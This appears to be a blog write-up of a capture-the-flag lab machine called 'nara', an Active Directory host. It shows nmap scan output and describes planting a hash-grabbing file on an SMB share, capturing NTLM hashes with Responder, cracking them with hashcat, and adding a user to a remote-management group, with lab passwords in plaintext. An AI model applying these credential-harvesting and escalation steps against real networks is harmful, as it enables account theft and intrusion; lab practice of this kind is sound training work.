nara
00 min
2025-3-27
Date
Mar 23, 2025 → Mar 23, 2025
Tag
Nmap
Credential Harvesting
Privilege Escalation Techniques

192.168.140.30

Nmap

└─# nmap -sT -p- --min-rate 5000 $ip Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-03-23 06:49 EDT Stats: 0:00:00 elapsed; 0 hosts completed (1 up), 1 undergoing Connect Scan Connect Scan Timing: About 2.14% done; ETC: 06:49 (0:00:00 remaining) Nmap scan report for 192.168.140.30 Host is up (0.066s latency). Not shown: 65511 filtered tcp ports (no-response) PORT STATE SERVICE 53/tcp open domain 88/tcp open kerberos-sec 135/tcp open msrpc 139/tcp open netbios-ssn 389/tcp open ldap 445/tcp open microsoft-ds 464/tcp open kpasswd5 593/tcp open http-rpc-epmap 636/tcp open ldapssl 3268/tcp open globalcatLDAP 3269/tcp open globalcatLDAPssl 3389/tcp open ms-wbt-server 5985/tcp open wsman 9389/tcp open adws 49664/tcp open unknown 49667/tcp open unknown 49669/tcp open unknown 49670/tcp open unknown 49685/tcp open unknown 49687/tcp open unknown 49694/tcp open unknown 49705/tcp open unknown 49708/tcp open unknown 49739/tcp open unknown
Nmap done: 1 IP address (1 host up) scanned in 26.54 seconds
└─# nmap -sU -p- --min-rate 5000 $ip Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-03-23 06:49 EDT Nmap scan report for 192.168.140.30 Host is up (0.064s latency). Not shown: 65532 open|filtered udp ports (no-response) PORT STATE SERVICE 53/udp open domain 88/udp open kerberos-sec 123/udp open ntp
Nmap done: 1 IP address (1 host up) scanned in 26.59 seconds

139,445

notion image
Nothing valuable found
we try to access SMB via account root:nara which can be login
notion image
I have checked nara file, only this file can be found
notion image
The content of this file means everyone will click into file which in this folder
notion image
so we set a responder to capture hash from some click our hashgrab
notion image
we upload it and will received hash from someone who click the file
notion image
and then we hashcat the hash, also we can know the hash type is
notion image
notion image
got the password
TRACY.WHITE:zqwj041FGX
We attempt to use the credentials to access port 5985, but fail
notion image
since it is not a member of remote management group, so we can use rpc to add it in
notion image
successful

PE

notion image
we found this hash, but no sure what it is
notion image
Jodie.Summers:hHO_S9gff7ehXw
notion image
notion image
notion image
notion image
got it
 
上一篇
HB
下一篇
AZ-900